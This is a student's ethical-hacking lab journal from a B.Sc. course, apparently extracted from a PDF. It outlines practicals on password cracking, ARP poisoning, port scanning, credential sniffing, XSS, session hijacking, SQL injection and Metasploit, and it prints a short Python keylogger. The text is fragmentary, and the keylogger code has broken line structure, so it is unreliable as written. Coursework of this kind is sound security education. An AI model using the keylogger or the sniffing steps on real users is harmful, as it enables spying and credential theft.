EH Journal
EH Journal
Science College
Bandra, Mumbai – 400050.
CERTIFICATE
This is to certify that Mr.Aryan Gupta of T.Y.B.Sc(Computer Science) class (VI Semester) bearing Roll
subject of Ethical Hacking a part of B.Sc. in Computer Science Program during the academic year
2023 – 2024.
Date of Certification:
Step 2: Enter the website name and hit the “Enter button”.
Step 3: Show you information about www.prestashop.com
PRACTICAL NO. 2
2.1) Use Crypt Tool to encrypt and decrypt passwords using RC4 algorithm.
Tools like CrypTool and Cain & Abel to explore password encryption and cracking provides a valuable
learning experience in understanding the strengths and weaknesses of cryptographic methods and
password security. Below, I outline how you can use these tools in an ethical hacking context to
encrypt and then attempt to crack passwords. This practical is designed for educational purposes to
better understand and improve cybersecurity measures.
Step
1:
Step 2 : Using RC4.
Decryption
2.2) Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode
wireless network passwords
e.g(MD5)
Then right click on the file and select (Add to List) and then select the Wordlist
Select all the options and start the dictionary attack
PRACTICAL NO. 3
Ifconfig
Netstat
3.2) Perform ARP Poisoning in Windows
AIM : Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS.
Port scanning is a fundamental technique in ethical hacking used to determine which ports on a
networked system are open, closed, or filtered. This process helps identify active services and potentially
vulnerable points on a target system. Nmap (Network Mapper) is one of the most popular and powerful
tools used for port scanning and network discovery.
NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to check if it is
installed properly. Now type the below commands.
Step 3: In Capture interface, Select Local Area Connection and click on start.
Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.
Step 5: Open a website in a new window and enter the user id and password. Register if needed.
Step 6: Enter the credentials and then sign in.
Step 11: U will see the email- id and password that you used to log in.
DOS
Using NEMESIS
PRACTICAL NO. 6
AIM: Simulate persistant Cross Site Scripting attack.
Persistent XSS is a type of security vulnerability found in web applications where the attacker injects
malicious scripts into user input fields, such as text boxes or comment sections, which are then stored on
the server-side and displayed to other users when they visit the affected page. Unlike reflected XSS,
where the injected script is reflected off the web server, persistent XSS persists over time because the
malicious script is permanently stored on the server.
PRACTICAL NO. 7
AIM: Session impersonation using Firefox and Tamper Data add-on
Session impersonation, also known as session hijacking or session fixation, is a type of cyber attack where
an unauthorized party gains control over a user's session on a web application. In a typical web application
session, a user is assigned a unique identifier, often in the form of a session ID or token, upon
authentication. This identifier is used to track the user's interactions with the application until they log out
or the session expires.
A] Session Impersonation
STEPS
1. Open FireFox
2. Go to Tools > Addons > Extension
3. Search and install EditThisCookie or Cookie Import/Export or any other Cookie tool
4. Then Click on Cookie extension to get cookie
5. Open a Website and Login and then click on export cookie
1. Open FireFox
2. Go to Tools > Addons > Extension
3. Search and install Temper Data
Here you go
PRACTICAL NO. 8
SQL injection (SQLi) is a type of cyber attack that targets the vulnerabilities in a web application's
database layer. It occurs when an attacker injects malicious SQL (Structured Query Language) code into
input fields or parameters used by an application to interact with its database. This injected SQL code can
manipulate the database in unintended ways, potentially allowing the attacker to execute unauthorized
SQL queries, retrieve sensitive data, modify or delete database records, and in some cases, take control
of the entire database server.
Step 7 : Go to security setting option in left and set security level low.
Step 8 : Click on SQL injection option in left.
Step 9 : Write "1" in text box and click on submit.
A keylogger is a type of software or hardware device that records every keystroke typed on a computer
keyboard. It can capture keystrokes in real-time and store them locally or transmit them to a remote
location controlled by an attacker.
- -----------------------------------------------------------------------------------
from pynput.keyboard import Key, Listener import
logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function logging.basicConfig(filename=(log_dir+"key_log.txt"),
level=logging.DEBUG,
format='%(asctime)s:%(message)s:') #
This is from the library def
on_press(key):
logging.info(str(key))
# This says, listener is on with Listener(on_press=on_press)
as listener:
listener.join()
Output: -
PRACTICAL NO. 10
Steps:
Download and open metasploit
Use exploit to attack the host
Create the exploit and add the exploit to the victim’s PC